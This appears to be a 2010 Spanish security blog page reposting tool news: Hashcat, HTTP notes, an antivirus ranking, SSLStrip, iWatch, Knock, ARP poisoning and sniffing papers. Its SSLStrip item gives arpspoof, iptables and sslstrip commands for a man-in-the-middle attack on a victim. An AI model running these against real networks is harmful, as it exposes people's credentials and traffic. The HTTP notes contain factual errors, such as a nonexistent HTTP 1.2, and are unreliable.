    * Load hashlist with more than 3 million hashes of any type at once
    * Load saltlist from external file and then use them in a Brute-Force Attack variant
    * Able to work in an distributed environment
    * Specify multiple wordlists and also multiple directories of wordlists
    * Number of threads can be configured
    * Threads run on lowest priority
    * 33+ Algorithms implemented with performance in mind
    * ... and much more


    Características (Inglés) (oclHashcat):

    # Free
    # Multi-GPU
    # Multi-Hash
    # Linux & Windows native binaries
    # Uses OpenCL
    # Fastest multihash MD5 cracker on NVidia cards
    # Fastest multihash MD5 cracker on ATI 5xxx cards
    # Supports wordlists (not limited to Brute-Force / Mask-Attack)
    # Can mix wordlists with Mask-Attack to emulate Hybrid-Attacks
    # Runs very cautious, you can still watch movies while cracking
    # Number of workload can be configured (like -n in hashcat)
    # Supports pause / resume
    # Supports huge numbers of hashes (4 million and more)
    # Able to work in a distributed environment
    # Includes hashcats entire rule engine to modify wordlists on start


    (Hashcat) soporta:

    * MD5
    * md5($pass.$salt)
    * md5($salt.$pass)
    * md5(md5($pass))
    * md5(md5(md5($pass)))
    * md5(md5($pass).$salt)
    * md5(md5($salt).$pass)
    * md5($salt.md5($pass))
    * md5($salt.$pass.$salt)
    * md5(md5($salt).md5($pass))
    * md5(md5($pass).md5($salt))
    * md5($salt.md5($salt.$pass))
    * md5($salt.md5($pass.$salt))
    * md5($username.0.$pass)
    * md5(strtoupper(md5($pass)))
    * SHA1
    * sha1($pass.$salt)
    * sha1($salt.$pass)
    * sha1(sha1($pass))
    * sha1(sha1(sha1($pass)))
    * sha1(strtolower($username).$pass)
    * MySQL
    * MySQL4.1/MySQL5
    * MD5(Wordpress)
    * MD5(phpBB3)
    * MD5(Unix)
    * SHA-1(Base64)
    * SSHA-1(Base64)
    * SHA-1(Django)
    * MD4
    * NTLM
    * Domain Cached Credentials
    * MD5(Chap)
    * MSSQL


    (oclHashcat) soporta:

    * MD5
    * md5(md5($pass))
    * md5(md5($pass).$salt)
    * MD4
    * NTLM

    Screenshots:

    Hashcat Client (Linux-Terminal):
    Click here to enlarge

    Hashcat-GUI (Windows):
    Click here to 
enlarge

    Comparación de velocidad (Hashcat):
    Click here to enlarge

    oclHashcat (Hashcat para CUDA / ATI):
    Click here to 
enlarge

    Comparación de velocidad (oclHashcat):
    Click here to enlarge

    Download (Hashcat) (Terminal Version - *nix / Windows):
    http://hashcat.net/files/hashcat-0.34.rar

    Download (Hashcat) (GUI Version - Windows):
    http://hashcat.net/files/hashcat-gui-0.2.433.rar

    Download (oclHashcat) (Terminal Version - *nix / Windows):
    http://hashcat.net/files/oclHashcat-0.18.rar


    Página Oficial:
    http://hashcat.net/hashcat/

    Fuente: http://foro.latinohack.com/

    10 jun 2010

    Apuntes HTTP

    Buenos Muchach@s estos son algunos apuntes que tengo sobre el protcolo http (estos apuntes lo hice cuando me di la tarea de empezar a profundizar sobre los procolos de red así que empece con el HTTP y siempre me a gustado documentar lo que aprendo así que lo comparto con ustedes) no es mucha cosa pero a alguien le servirá :)


    Http ===> protocolo de transferencia de hipertexto
    Puerto ===> 80
    Última version ===> HTTP 1.2
    Protocolo ===> Aplicación | http


    Versiones:

    0.9 ===> Obsoleta, soporta un solo comando GET, no soporta cabeceras, este version no soporta post el cliente no puede enviarle mucha información al servidor.

    HTTP/1.1 ===> Primera revisión que especifica su versión en las comunicaciones, se usa usualmente en servidores proxy

    HTTP/1.1 ===> Versión actual, las conexiones persistentes están activadas por defecto, funciona bien con los proxies, También permite al cliente enviar múltiples peticiones a la vez (pipelining) lo que hace es posible eliminar el tiempo de delay de cada petición.

    HTTP/1.2 ===> Más avanzada


    Dialogo HTTP

    Envía cliente:
    GET /index.html HTTP/1.1
    Host: www.abc.com
    User-Agent: nombre-cliente

    La respuesta sera
    HTTP/1.1 200 OK
    DATE: Fri, 31 Dec 2010 24:12:21 GMT
    Content-Type: text/html
    Content-Length: 1221
    
    
    
    (contenido)
    .
    .
    .


    Métodos de petición:

    Verbos ===> 8 , indican la acción que se va a realizar en el recurso indicado.

    [*] HEAD ===> Pide la respuesta idéntica a la que correspondería la peticion GET, pero sin el cuerpo de la respuesta, esto es útil para la recuperación de metainformacon escrita en los encabezados de respuesta, sin tener que transportar todo el contenido.

    [*] GET ===> Pide una representación del recurso especificado. Por seguridad no debería ser usado por aplicaciones que causen efecto ya que transmite información a través de la URI agregando parámetros a la URL.

    [*] POST ===> somete los datos a que sean procesados para el recurso identificado. los datos se incluirán en el cuerpo de la petición. Esto puede resultar en al creación de un nuevo recurso o de las actualizaciones de los recursos existentes o ambas cosas.

    [*] PUT ===> Sube, carga o realiza un upload de una de un recurso especificado (archivo), es el camino mas eficiente para subir archivos aun servidor, esto es por que el post utiliza un mensaje multioarte y,el mensaje decodificado por el servidor. en contraste, el método PUT te permite escribir un archivo en una conexión socket establecida con el servidor. la desventaja de put es que los servidores hosting compartido no lo tiene habilitado.

    PUT /path/filename.html HTTP/1.1

    [*] DELETE ===> borra el recurso especificado

    [*] TRACE ===> este método solicita al servidor que envía de vuelta un mensaje de respuesta, en la sección de entidad toda la data que reciba del mensaje de solicitud, Se utiliza con fines de comprobación y diagnostico.

    [*] OPTIONS


    Códigos de respuesta:

    1xx Mensajes
    #100 - Conexión rechazada
    111 Conexión Rechazada
    
    2xx Operación Exitosa
    200 OK
    201-203 Información no oficial
    204 Sin contenido
    205 Contenido para recargar
    206 Contenido parcial
    
    3xx Redirección Hacia otro URL
    300 Múltiples posibilidades
    301 Mudado permanentemente
    302 Encontrando
    303 vea otros
    304 No modificado
    305 Utilice un proxy
    307 Redirección Temporal
    
    4xx Error por parte del cliente
    400 Solicitud incorrecta
    401 No autorizado
    402 Pago requerido
    404 No encontrado
    405 Método no permitido
    406 No aceptable
    407 Autentificación requerida
    408 Tiempo de espera agotado
    409 Conflicto
    410 Ya no disponible
    411 Requiere longitud
    412 Fallo de precondición
    413 Entidad de solicitud demasiado larga
    414 URL de solicitud demasiado larga
    415 Tipo de medio no soportado
    416 Rango de solicitado no disponible
    417 Fallo expectiva
    
    5xx Error por parte del servidor
    500 error interno
    501 No implementado
    502 Pasarela incorrecta
    503 Servicio no disponible
    504 Tiempo de espera de la pasarela agotado
    505 versión de http no soportada

    Fuente: http://charsecurity.blogspot.com/

    9 jun 2010

    [AntiVirus Gratuitos!] TOP 10

    Es difícil. Escoger un antivirus tiene tanta relevancia como escoger incluso un sistema operativo. Es el escudo principal, aquello que no debe fallar porque de lo contrario se siembra el caos en nuestros sistemas. El antivirus ideal para un usuario puede resultar una pesadilla para otro. Aunque no sea posible tomar una decisión definitiva, se pueden hacer recomendaciones y sugerencias, guías para tener en cuenta un producto específico o para darle una segunda mirada si la primera vez lo dejamos pasar. El atractivo de los antivirus gratuitos es innegable. Suelen compartir muchas cosas con sus hermanos comerciales, y aún así ofrecen una protección sólida a un costo cero. 

    No todos los antivirus gratuitos tienen las mismas funciones, ni las mismas capacidades. Algunos de ellos ni siquiera se mantienen en guardia mientras se utiliza el ordenador, pero otros nada tienen que envidiarle a una solución comercial. Por lo tanto, nos parece acertado colocarlos en escala.

    10) Emsisoft a-squared Free
    Los diez mejores antivirus gratisAlgo desconocido y un poco desplazado entre los antivirus gratuitos, a-squared Free apareció en nuestro radar después de cierta asociación con la gente que desarrollo el firewall Online Armor. a-squared posee tanto un antivirus como un anti-malware, por lo que es posible detectar otras clases de bichos. Sin embargo, a-squared es un producto que trabaja por demanda, o sea, no se mantiene residente en el ordenador ni posee capacidades de automatización frente a una amenaza. Como si eso fuera poco, los análisis publicados en su página oficial son obsoletos, y demanda más de 96 MB de descarga, razones más que suficientes para ubicarlo en el décimo lugar sobre diez.

    Los diez mejores antivirus gratis9) ClamWin
    La única opción de código abierto en toda la lista, ClamWin está basado en el conocido Clam Antivirus. Durante el tiempo que lo hemos utilizado notamos que la base de datos era actualizada muy frecuentemente, mientras que su demanda de recursos se mantenía extremadamente baja. Por otro lado, ClamWin también trabaja por demanda, ya que carece de un sistema activo de protección. Actualmente existe un proyecto paralelo que agrega dicha función, pero aún no hay novedades en los canales oficiales. Otro detalle de ClamWin es su baja tasa de detección. Hemos consultado varios estudios, y aún se ubica muy lejos de las opciones más robustas, por lo que no tenemos otra opción más que colocarlo en esta posición de la lista.

    8) Comodo Antivirus
    Los diez mejores antivirus gratisComodo es más conocido por su firewall gratuito y por sus soluciones integrales de seguridad, pero también posee un antivirus completamente gratis. Las opiniones sobre este antivirus se mantienen bastante divididas. Por un lado se lo considera como una opción muy sólida, mientras que también se han criticado algunos detalles sobre su demanda de recursos, algo que parece ser una moneda bastante corriente entre el software de Comodo. De acuerdo a nuestra experiencia, los productos Comodo hacen su trabajo, pero no son paladines en eficiencia. Por lo tanto, este lugar en la lista parece ser el adecuado.

    Los diez mejores antivirus gratis7) BitDefender Free
    Algunos podrán cuestionar que esta solución gratuita se encuentre en esta posición, siendo en realidad un antivirus manual que sólo puede ser utilizado por demanda. La gente que desarrolla al BitDefender ha dejado la protección automática de forma exclusiva en opciones comerciales, lo cual limita de forma considerable a la edición gratuita. Sin embargo, BitDefender Free comparte el mismo motor de detección que las versiones comerciales, el cual es conocido por ser uno de los mejores del mercado. Esta es una circunstancia de peso que coloca a BitDefender en el séptimo puesto de la lista, de lo contrario habría aparecido un poco más atrás.

    Los diez mejores antivirus gratis6) PC Tools AntiVirus Free
    Conocemos mejor a PC Tools a través de su solución comercial, que mantiene un puntaje muy decente entre las mediciones hechas por el estudio independiente AV Comparatives. Al igual que con BitDefender Free, su tasa de detección ha mostrado resultados sólidos, sin embargo, no ha logrado adquirir la popularidad de otras opciones gratuitas. Algunos problemas en versiones anteriores han dejado a PC Tools Free algo manchado, y aunque esto no sucede con su última versión, lo cierto es que hay opciones mejores más adelante en la lista.

    Los diez mejores antivirus gratis5) Panda Cloud AntiVirus
    Hemos visto a la edición en la nube del Panda Antivirus muchas veces, y los resultados que hemos obtenido de él son muy interesantes. ¿Por qué entonces está ubicado aquí? No porque sea malo, sino porque los antivirus que están por encima son más completos. El concepto de antivirus en la nube todavía se encuentra en cierta etapa experimental, más allá de que el antivirus ya pueda ser descargado en su versión final. Este es tal vez el mayor punto de resistencia para el Panda Cloud, ya que los usuarios en general están acostumbrados a soluciones locales. Panda Cloud AntiVirus es parte del top 5, y lo es con mérito propio.

    4) Microsoft Security Essentials
    Los diez mejores antivirus gratisNadie creía que Microsoft sería capaz de mantenerse dentro del mercado de los antivirus, después del "percance" sufrido con el ya extinto OneCare. Pero más allá de que Security Essentials aparezca instalado en casi todo ordenador que posea a Windows 7 preinstalado, lo cierto es que ha resultado ser una opción de seguridad gratuita muy interesante. Bastante honesto con su consumo de recursos, Microsoft Security Essentials también ha obtenido una posición significativa en la última prueba de AV Comparatives. Sus únicos dos puntos en contra son la validación WGA y la imposibilidad de desactivar el acceso al servicio SpyNet, algo que mantiene alejados a una cantidad significativa de usuarios.

    Los diez mejores antivirus gratis3) AVG Free
    En una época, no habíamos dudado en declararlo la mejor opción en materia de antivirus gratuitos. Ahora, AVG puede mantenerse como uno de los más descargados entre sus competidores, pero sus últimas versiones han causado algunas molestias entre los usuarios. Incluso nosotros hemos tenido ciertos percances de compatibilidad que nos obligaron a quitarlo de algunos ordenadores. AVG Free se ubica en el tercer lugar por su popularidad y porque mantiene una tasa de detección muy similar a la que posee Security Essentials, pero con la ventaja de no necesitar procesos adicionales como la validación de Windows. Está en el top 3, pero tiene espacio para mejorar.

    2) Avira AntiVir Free Edition
    Los diez mejores antivirus gratisDeterminar esta posición ha sido lo más difícil de todo el artículo. Todos sabemos que Avira es un antivirus extraordinario, y que no dudaríamos en recomendarlo en ningún caso. Utiliza el motor de su versión comercial, con una capacidad de detección superior al 99 por ciento. Es bastante humilde a la hora de demandar recursos, y sus períodos de actualización son razonables. Sólo está el detalle de ese anuncio de publicidad que aparece cada vez que se actualiza, pero puede ser bloqueado fácilmente. Avira no está en el segundo lugar porque tenga algo malo, sino porque hay algo mejor, y es...

    Los diez mejores antivirus gratis1) Avast! Free Antivirus 5
    No quedan dudas: La nueva versión 5 de Avast ha arrasado en todos los aspectos. Nueva interfaz, bajo consumo de recursos, excelente tasa de detección, fácil de instalar, un muy sencillo proceso de registro, actualizaciones frecuentes, y algo especialmente importante: Es prácticamente invisible, salvo por la voz que anuncia una actualización finalizada. Avira y Avast son, actualmente, los dos antivirus gratuitos que deberían ser tenidos en cuenta por sobre todos los demás. Sin embargo, es posible buscar razones que coloquen a Avast por encima de Avira. Una de ellas es que el proceso de actualización de Avast es más limpio que el de Avira. Es algo común que los antivirus gratuitos no tengan prioridad a la hora de descargar actualizaciones, pero en Avast esto se nota menos que con Avira. Definitivamente, recomendado.

    Como siempre mencionamos en estos casos, este orden no debe ser tomado a rajatabla. Hemos combinado experiencias propias, comentarios de los usuarios y mediciones hechas por terceros para colocar cada antivirus donde está, y aunque estamos seguros de que veremos a algún lector en desacuerdo (es imposible que todos queden conformes), creemos que la distribución final ha sido más que justa. Aún así, esperamos sus comentarios y sus experiencias con alguno de estos antivirus gratis. ¡Buena suerte!

    [SSLStrip] Espiando tráfico SSL

    Desde que Moxie Moulinsart mostró su SSLStrip en Blackhat, el MODO PARANOICO de muchas personas quedó encendido y no es para menos, ya que con esta herramienta cualquier persona puede espiar tu trafico SSL sin problemas.
    SSLStrip
    El funcionamiento de SSLStrip es simple, reemplaza todas las peticiones “https://” de una página web por “http://” y luego hacer un MITM entre el servidor y el cliente. La idea es que la víctima y el agresor se comuniquen a través de HTTP, mientras que el atacante y el servidor, se comunican a través de HTTPS con el certificado del servidor. Por lo tanto, el atacante es capaz de ver todo el tráfico en texto plano de la víctima.

    A continuación les dejo vídeo, donde podemos apreciar en funcionamiento de esta excelente herramienta.


    En resumen, los pasos serían:

    1. Configurar IP Forwarding:
    echo 1 > /proc/sys/net/ipv4/ip_forward

    2. Realizando ataque ARP MITM entre las 2 maquinas:
    arpspoof -i eth0 -t VICTIMA HOST

    3. Redireccionar trafico con iptables:
    iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT  –to-ports 8080

    4. Iniciar SSLStrip en el puerto utilizado
    python sslstrip.py -w archivo

    Fuente: http://www.dragonjar.org/

    [iWatch] Monitorización de integridad de ficheros en Linux en tiempo real

    Con iWatch una herramienta de monitorización de integridad de ficheros en tiempo real, para sistemas Linux. iWatch se puede ejecutar en dos modos:
    • Modo del demonio, donde iWatch se ejecuta como demonio del sistema y supervisa los blancos marcados en el archivo configuración xml.
    • Modo comando, especificando todos los parámetros: blanco a monitorizar, dirección de correo a la que enviar informe, excepciones….

    Características destacadas de iWatch:

    • Envía alertas de cambios al correo electrónico y permite configurar varios correos electrónicos por cada blanco a monitorizar.
    • Permite usar excepciones de forma que si no se quiere supervisar un archivo concreto dentro de un directorio blanco se puede excluir.
    • Permite configurar acciones a realizar cuando se detecta una modificación en el blanco que supervisa. Por ejemplo: configurar iWatch para que si se modifica un archivo restablecer una copia original del archivo.
    • Permite configurar que aspectos se quieren monitorizar: cambios en atributos, modificaciones, apertura de fichero, cierre, si fue movido…

    Esta herramienta puede ser muy útil para monitorizar archivos sensibles o directorio, frente cualquier cambio. Como por ejemplo monitorizar de los archivos /etc/passwd o /etc/shadow, el directorio /bin o supervisar el directorio de raíz de un sitio web, contra cualquier cambio indeseado.

    Más información y descarga de iWacth:
    http://iwatch.sourceforge.net/index.html

    Fuente: http://vtroger.blogspot.com/

    [Knock v1.3b] Enumeración de Subdominios (Fuerza Bruta)

    Knock es un script diseñado en python para enumerar subdominios de una host (web) con una wordlist.

    Modo de uso:
    $ python knock.py [ url ] [ wordlist ]

    Video demostrando el uso de Knock en facebook:


    Knock trabaja en Linux, Windows y MAC OSX con versiones de python 2.6.x (o menor).

    Requerimientos:
    • Python versión 2.6.x o menor.
    • Una wordlist. 

    Binario para Windows
    Package para Linux


    Leer más aquí.

    Fuente: http://www.darknet.org.uk

    6 jun 2010

    [ZeroDayScan] Escáner de seguridad para tu sitio web

    Si necesitas validar la seguridad de tu sitio web puedes hacer uso de ZeroDayScan, un servicio en línea gratuito que genera un informe de posibles vulnerabilidades o ataques que están afectando a tu sitio.

    Para comenzar el escaneo debes facilitar la URL de la página web y tu dirección de correo electrónico. Para verificar que eres el propietario del dominio, tienes que subir un archivo específico al servidor.

    Una vez hecho esto, el resultado del análisis te llega al correo electrónico en 10 o 30 minutos, dependiendo de qué tan grande sea el sitio. ZeroDayScan detecta ataques Cross-site scripting (XSS), bugs de día cero, directorios ocultos y archivos de copia de seguridad, busca vulnerabilidades de seguridad conocidas y vulnerabilidades de inyección SQL.



    4 jun 2010

    [Envenenamiento ARP] Paper

      El envenenamiento ARP es una técnica usada por atacantes en redes internas cuyo fin es obtener el tráfico de red circundante, aunque no esté destinado al sistema del propio intruso.

    Existen numerosos métodos que se pueden aplicar en una red para prevenir que un atacante pueda llevar a cabo un ataque de envenenamiento ARP. Lo más efectivo es una adecuada combinación de varias técnicas.

    Este artículo se enmarca dentro de la serie Cuaderno de notas del Observatorio.
    Fuente: http://www.inteco.es/

    3 jun 2010

    [Firefox 4] Nueva interfaz muy mejorada

    Mozilla Firefox introducirá un cambio sustancial en su próxima versión Firefox 4, muy notable en modo de apariencia visual. En esta versión desaparecerán por completo los ya obsoletos menús clásicos de cajas y se controlará todo mediante pestañas. Conoce a continuación cómo será la nueva interfaz gráfica de Mozilla Firefox 4.

    De esta forma, el navegador del panda rojo pretende modernizarse y de paso hacer su navegador aún más funcional y sencillo de utilizar. Aparte de las páginas web, podremos configurar las preferencias y administrar complementos a modo de pestaña.
    Uno de los diseñadores de Mozilla Firefox, Stephen Horlander, ha realizado las siguientes declaraciones al respecto:
    Una de nuestras prioridades para Firefox 4 ha sido trabajar hasta conseguir más partes de la interfaz secundaria integradas en la primaria.
    Ésto hace que distintas interfaces vayan al mismo espacio conceptual. He estado explorando formas de visualizar cómo unificarlas y establecer una interfaz única para todo. La meta es crear algo que parezca atractivo, que conecte la variedad de distintos tipos de interfaces gráficas y que sea reconocible en una interfaz única que pueda cambiar su estilo dependiendo de la plataforma.
    Éstas son las imágenes de lo que será la nueva interfaz gráfica de Firefox 4:




    Fuente: http://www.softzone.es/

    1 jun 2010

    [Sniffing] Paper Introductorio

    Progresive Death crea un paper sobre Sniffing donde enseña como interceptar contraseñas y como configurar el Ettercap en Linux. Excelente para introducirse en el tema...

    Este laboratorio teorico practico , se tratara sobre el tema del sniffing (el sniffing como tal es atrapar / analizar / visualizar al trafico que esta pasando por la red ) en este lab veremos como sniffear trafico del protocolo https (es el mismo del http solo que este es mucho mas seguro).

    Sniff


    Autor: Progresive Death
    Fuente: http://charsecurity.blogspot.com/

    ['Botnet' o red 'Zombie'] Qué es ??

    Muchas veces nos enfrentamos con la necesidad de comunicar, a gente no especializada, de forma sencilla algunos conceptos. Como puede ser el caso de responder ¿que es una 'botnet'?

    David Alameda de diario El Mundo.es preparó una breve y eficaz presentación gráfica que se puede ver aquí.




    Fuente: http://blog.segu-info.com.ar/

    Labels

    0-day (12) 1337day (1) 8.8 (2) Adobe Acrobat (1) Android (2) Anonimato (1) Anonymous (9) BackDoor (2) BackTrack (15) badUSB (1) Base64 (1) Black Hat (7) BlackHat (1) Blackploit (30) Brute Force (3) Bug (106) Bypass Password (1) Bypass Redirect (1) C99 Shell (1) Carding (1) CheatSheet (15) Chilean Way (2) Conference (10) Cryptsetup (1) CSRF (1) DDoS (11) DEF CON (3) DEFCON (7) Dev (1) Diapositivas (1) Diseño Web (1) Distro Linux (27) Documental (2) DoS (2) Drupal (1) DuckDuckGo (1) E-zine (18) Ekoparty (1) Escaneo (4) España (1) Exploit (64) Ezine (1) Facebook (1) Fast-Info (44) FBI (1) Ficheros Binarios (1) Firefox (4) Flash (2) Forense (9) Fuerza Bruta (11) Fuga de Datos (1) GhostShell (1) GNU/Linux (4) Google (2) Guía (1) Hack T00LZ (135) Hack Tips (63) Hacked (6) Hacking (19) Hacking Hardware (5) HashCat (1) Herramientas (125) HighSecCON (1) Humor Geek (13) Infografía (1) Ingeniería Social (5) Inj3ct0r (1) Internet Explorer (3) Java (7) JavaScript (2) Kali (3) KitPloit (6) Leaks (22) Linux OS (79) LulzSec (1) Mac OS (10) Magazine (1) Malaware (3) Malaware Tools (12) Malware (1) Man in the Middle (15) Manuales (3) MD5 CRACK (4) Metasploit (57) MSSQL (1) MySQL (6) MySQL CRACK (1) Nmap (6) Nmap NSE (2) Noticias (200) NTLM CRACK (1) Ofuscar (5) OpenSolaris OS (1) OpenSSL (1) ORACLE (1) OWASP (3) Paper (10) PDF (7) PenTest (14) Perl (2) Phearking (13) Phishing (3) PHP (13) phpMyAdmin (1) PoC (1) Premios Bitacoras (1) Presentaciones (11) PRISM (1) Privacidad (2) Programación (12) Programas Linux (41) Programas Windows (41) Pwned (1) Python (5) Ransomware (1) Reconocimiento (5) Ruby (2) s (1) Scripts (7) Seguridad (150) Seguridad Web (139) Seguridad Wireless (19) Sensitive Data Exposure (2) SHA1 CRACK (1) Shellshock (1) Slides (1) Spoofing (1) Spyware (1) SQLi (19) SQLi Tools (7) SQLMap (2) SSH (1) Textos (74) Tips (57) Troyanos y Virus (11) Trucos (7) Trucos Win (7) Turiales (56) Tutoriales (18) Twitter (1) Ubuntu (2) Underc0de (1) UnderDOCS (1) Unlock (1) URL Redirection (1) UXSS (1) vBulletin (1) Video (48) Virtualización (2) Web T00LZ (16) Wifislax (1) Wikileaks (1) WikiRebels (1) Windows OS (65) Wireless Tools (13) XSS (16) Youtube (1)

     
    biz.